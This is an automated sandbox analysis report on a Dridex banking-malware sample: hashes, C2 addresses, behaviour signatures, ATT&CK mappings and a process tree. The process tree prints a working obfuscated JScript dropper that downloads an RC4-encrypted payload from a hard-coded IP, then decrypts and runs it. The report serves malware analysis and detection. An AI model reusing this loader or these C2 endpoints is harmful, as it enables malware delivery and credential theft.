Analysis

  • max time kernel
    72s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    10-04-2021 13:47

General

  • Target

    Five.exe

  • Size

    347KB

  • MD5

    9bd60d8672e34193a3bb35a09d3d4dc5

  • SHA1

    8ca91b14d95b896a7afe2430830ed88c2700d0ab

  • SHA256

    610d9028a1aac20684ad5bf0b6c0212016eceb3d6d4563cead3c398aac441c5b

  • SHA512

    a4f32f18f54119e1b1dc1d13e8a9ca11695cd4fe66880ce3ccc27679d66d4e7ed08a74a2ddc0dded0534f2af8d5336e4cfd062d6f9359059d9f9a9a03815cd63

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

131.100.24.231:443

188.165.17.91:8443

185.148.169.10:2303

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Five.exe
    "C:\Users\Admin\AppData\Local\Temp\Five.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:768
    • C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe
        "C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe" 1 105
        3⤵
        • Executes dropped EXE
        PID:1916
    • C:\Users\Admin\AppData\Local\Temp\A4S2Z63PHW\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\A4S2Z63PHW\setups.exe" ll
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Users\Admin\AppData\Local\Temp\is-HIUNO.tmp\setups.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-HIUNO.tmp\setups.tmp" /SL5="$60152,2051888,270336,C:\Users\Admin\AppData\Local\Temp\A4S2Z63PHW\setups.exe" ll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:588
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:588 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.106/?MTk3MDA=&pWbW&oa1n4=x33QcvWYaRyPDojDM_jdSqRGP0zYHliIxY2&s2ht4=Yn6rVCJqvfzSk2bCIEBjw8VndSTvVgfdOKa1UbgC-jgeELgEOn8xeC15E87eqzkWNzVaYsJPU-UGJYgkW_JaRErUz21TxyLIQc5gjwRWD6jVTye5JUVwT4w5An6rPQKXKrkBzVkFgUlvKKp1wpRnGBiTsMj1wsfSyRDN2q-qT8rd3n5Qd&sfkmNDM2OQ==" "2"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1948
              • C:\Windows\SysWOW64\wscript.exe
                wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.106/?MTk3MDA=&pWbW&oa1n4=x33QcvWYaRyPDojDM_jdSqRGP0zYHliIxY2&s2ht4=Yn6rVCJqvfzSk2bCIEBjw8VndSTvVgfdOKa1UbgC-jgeELgEOn8xeC15E87eqzkWNzVaYsJPU-UGJYgkW_JaRErUz21TxyLIQc5gjwRWD6jVTye5JUVwT4w5An6rPQKXKrkBzVkFgUlvKKp1wpRnGBiTsMj1wsfSyRDN2q-qT8rd3n5Qd&sfkmNDM2OQ==" "2"
                7⤵
                • Blocklisted process makes network request
                • Suspicious use of WriteProcessMemory
                PID:1500
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c a23tj.exe
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1600
                  • C:\Users\Admin\AppData\Local\Temp\a23tj.exe
                    a23tj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:1100

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    1c678f38c8c0f4087d3b15f326f2ce34

    SHA1

    dc336ffcfefe30fc0e8f0fed849ae5f8badc15e0

    SHA256

    4afeebcafa9a920a67608d7279108a4b217216bc095edb1dcc868dfb3be5bb54

    SHA512

    ec83c5c607870689a5c71552007a5ce57ed8c2a4168a7c60a4dd53082b37364e14f0afa0ed7be5453e8a821c27754fc1c8127df4d068087ffa567253f82a2b80

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\A4S2Z63PHW\setups.exe
    MD5

    0554b2a90322539504c5d664b5e8796a

    SHA1

    51563605d7eeb788edb15c9b2229588f7595b352

    SHA256

    9588961c0f39a1ef6ddf5d58223309743e871d50c33da08878b48e642ce35240

    SHA512

    c77b25f26cbae6a9b25f9558408166fc9dbe4230443c9778d8e6f194fe0dfafa8379943ce66d27d7791dd3ca6e0ca28e1ab41e16e9679e877eec24e21bc11dc2

  • C:\Users\Admin\AppData\Local\Temp\A4S2Z63PHW\setups.exe
    MD5

    0554b2a90322539504c5d664b5e8796a

    SHA1

    51563605d7eeb788edb15c9b2229588f7595b352

    SHA256

    9588961c0f39a1ef6ddf5d58223309743e871d50c33da08878b48e642ce35240

    SHA512

    c77b25f26cbae6a9b25f9558408166fc9dbe4230443c9778d8e6f194fe0dfafa8379943ce66d27d7791dd3ca6e0ca28e1ab41e16e9679e877eec24e21bc11dc2

  • C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe
    MD5

    2b04b457e7e5074575dddf7e9391c014

    SHA1

    9bba9653bb3685854eb0d0aee4a07ea63d0ab7ac

    SHA256

    0a8ddf7be1e8bcaefd7fca87ee9adc6aabd53dee30c69b726beb0554b1746c6d

    SHA512

    bec0ebc42b46ccfe70ccb14582c5484faf76a6ec823889e58467b4139c4b8dd3e43cad8cbe4b547264b5a55bd438e481524298ee7f4293aa357c2af13b749905

  • C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe
    MD5

    2b04b457e7e5074575dddf7e9391c014

    SHA1

    9bba9653bb3685854eb0d0aee4a07ea63d0ab7ac

    SHA256

    0a8ddf7be1e8bcaefd7fca87ee9adc6aabd53dee30c69b726beb0554b1746c6d

    SHA512

    bec0ebc42b46ccfe70ccb14582c5484faf76a6ec823889e58467b4139c4b8dd3e43cad8cbe4b547264b5a55bd438e481524298ee7f4293aa357c2af13b749905

  • C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe
    MD5

    2b04b457e7e5074575dddf7e9391c014

    SHA1

    9bba9653bb3685854eb0d0aee4a07ea63d0ab7ac

    SHA256

    0a8ddf7be1e8bcaefd7fca87ee9adc6aabd53dee30c69b726beb0554b1746c6d

    SHA512

    bec0ebc42b46ccfe70ccb14582c5484faf76a6ec823889e58467b4139c4b8dd3e43cad8cbe4b547264b5a55bd438e481524298ee7f4293aa357c2af13b749905

  • C:\Users\Admin\AppData\Local\Temp\ZXC1AJQ5QA\multitimer.exe.config
    MD5

    3f1498c07d8713fe5c315db15a2a2cf3

    SHA1

    ef5f42fd21f6e72bdc74794f2496884d9c40bbfb

    SHA256

    52ca39624f8fd70bc441d055712f115856bc67b37efb860d654e4a8909106dc0

    SHA512

    cb32ce5ef72548d1b0d27f3f254f4b67b23a0b662d0ef7ae12f9e3ef1b0a917b098368b434caf54751c02c0f930e92cffd384f105d8d79ee725df4d97a559a3d

  • C:\Users\Admin\AppData\Local\Temp\a23tj.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • C:\Users\Admin\AppData\Local\Temp\a23tj.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • C:\Users\Admin\AppData\Local\Temp\is-HIUNO.tmp\setups.tmp
    MD5

    62a8ecd6d5d293a7af79056ebd79d2a0

    SHA1

    0d94c2d445dcc27d796cb3ddfaf3edb9aaa6166f

    SHA256

    6da810d0fdfc66018a9fb102989918b04afc231fc935981639c6519caea95827

    SHA512

    871f73efd75319aee572442cd7dd66b407ea1c2737f82d6cbd9454a707a279e953c4050b49e3bb55c7de4a4ced3928ac175d6960154f0c64cc07e286e8e227da

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Z2ERDE92.txt
    MD5

    e4ed33cdac8461e4590fefe9ed1a859c

    SHA1

    0c5fcbc74f14a6d61b4e4847b4768f3f2bbf1c0c

    SHA256

    e45d46b02bbd5de8d171d14c0a651debc60354641a823baf458f62a7241b777f

    SHA512

    1cd05cef5060744dec043cfd262cbf7f7f924f8686d32d50ec18309f62de2cba358cf9081f8c7b182d922cdc22f27699dc164b34ceb502259e64c0b9295250a4

  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch
    MD5

    e4b562cb903c17d283a09b6b34a60020

    SHA1

    3466e2e22411e34fe97ed298d0094f098642f672

    SHA256

    3fbabbb32bdea848b038af7b17ece338c5871d32b42c346ee21a324fb8c209d1

    SHA512

    1d669d198945989468d6a1edd609c973b46b49f13176ac26219550ec0d1b00354efe1fd8d2e6c79dc2f09bbfcab7531daa7f8355b486f10b7721cfbedeb9eac7

  • \Users\Admin\AppData\Local\Temp\a23tj.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • \Users\Admin\AppData\Local\Temp\a23tj.exe
    MD5

    a7e89c98e140c31ea0faeef1a65f4a89

    SHA1

    f481a992d58ee0c8a48132085f55f9d2e3448c7d

    SHA256

    081b494a1c401ab0940d7a0b1e47bdb845dd3c63107d9c90cba10845c7397edc

    SHA512

    a00450d2a6f8b5e21b2956fbd30c88921922ca94da51e612a7f9f4ce23842a84316b8b9f8bfacde98061e03d5f2e508d907e3e7d35b71d6e18aa6ad0f95823be

  • \Users\Admin\AppData\Local\Temp\is-HIUNO.tmp\setups.tmp
    MD5

    62a8ecd6d5d293a7af79056ebd79d2a0

    SHA1

    0d94c2d445dcc27d796cb3ddfaf3edb9aaa6166f

    SHA256

    6da810d0fdfc66018a9fb102989918b04afc231fc935981639c6519caea95827

    SHA512

    871f73efd75319aee572442cd7dd66b407ea1c2737f82d6cbd9454a707a279e953c4050b49e3bb55c7de4a4ced3928ac175d6960154f0c64cc07e286e8e227da

  • \Users\Admin\AppData\Local\Temp\is-QUJA5.tmp\_isetup\_isdecmp.dll
    MD5

    77d6d961f71a8c558513bed6fd0ad6f1

    SHA1

    122bb9ed6704b72250e4e31b5d5fc2f0476c4b6a

    SHA256

    5da7c8d33d3b7db46277012d92875c0b850c8abf1eb3c8c9c5b9532089a0bcf0

    SHA512

    b0921e2442b4cdec8cc479ba3751a01c0646a4804e2f4a5d5632fa2dbf54cc45d4cccffa4d5b522d42afc2f6a622e07882ed7e663c8462333b082e82503f335a

  • \Users\Admin\AppData\Local\Temp\is-QUJA5.tmp\idp.dll
    MD5

    b37377d34c8262a90ff95a9a92b65ed8

    SHA1

    faeef415bd0bc2a08cf9fe1e987007bf28e7218d

    SHA256

    e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

    SHA512

    69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

  • \Users\Admin\AppData\Local\Temp\is-QUJA5.tmp\itdownload.dll
    MD5

    d82a429efd885ca0f324dd92afb6b7b8

    SHA1

    86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

    SHA256

    b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

    SHA512

    5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

  • \Users\Admin\AppData\Local\Temp\is-QUJA5.tmp\psvince.dll
    MD5

    d726d1db6c265703dcd79b29adc63f86

    SHA1

    f471234fa142c8ece647122095f7ff8ea87cf423

    SHA256

    0afdfed86b9e8193d0a74b5752a693604ab7ca7369d75136899ff8b08b8c5692

    SHA512

    8cccbff39939bea7d6fe1066551d65d21185cef68d24913ea43f24b8f4e08a5581a9f662061611b15b5248f5f0d541e98d6f70164aaaad14d0856e76fabbfaa4

  • memory/588-85-0x0000000000000000-mapping.dmp
  • memory/768-60-0x0000000000A40000-0x0000000000A41000-memory.dmp
    Filesize

    4KB

  • memory/768-62-0x000000001B160000-0x000000001B162000-memory.dmp
    Filesize

    8KB

  • memory/1100-103-0x0000000000000000-mapping.dmp
  • memory/1100-106-0x00000000003A0000-0x00000000003DC000-memory.dmp
    Filesize

    240KB

  • memory/1100-107-0x0000000000400000-0x0000000000463000-memory.dmp
    Filesize

    396KB

  • memory/1436-72-0x0000000002090000-0x0000000002092000-memory.dmp
    Filesize

    8KB

  • memory/1436-63-0x0000000000000000-mapping.dmp
  • memory/1436-82-0x000007FEF4690000-0x000007FEF5726000-memory.dmp
    Filesize

    16.6MB

  • memory/1500-96-0x0000000000000000-mapping.dmp
  • memory/1508-87-0x0000000000000000-mapping.dmp
  • memory/1508-89-0x0000000000650000-0x0000000000652000-memory.dmp
    Filesize

    8KB

  • memory/1584-70-0x0000000000400000-0x0000000000449000-memory.dmp
    Filesize

    292KB

  • memory/1584-69-0x0000000075EF1000-0x0000000075EF3000-memory.dmp
    Filesize

    8KB

  • memory/1584-67-0x0000000000000000-mapping.dmp
  • memory/1600-99-0x0000000000000000-mapping.dmp
  • memory/1608-86-0x0000000000240000-0x0000000000241000-memory.dmp
    Filesize

    4KB

  • memory/1608-84-0x00000000003F0000-0x00000000003FE000-memory.dmp
    Filesize

    56KB

  • memory/1608-75-0x0000000000000000-mapping.dmp
  • memory/1916-94-0x0000000002070000-0x0000000002072000-memory.dmp
    Filesize

    8KB

  • memory/1916-90-0x0000000000000000-mapping.dmp
  • memory/1916-93-0x000007FEF4690000-0x000007FEF5726000-memory.dmp
    Filesize

    16.6MB

  • memory/1948-95-0x0000000000000000-mapping.dmp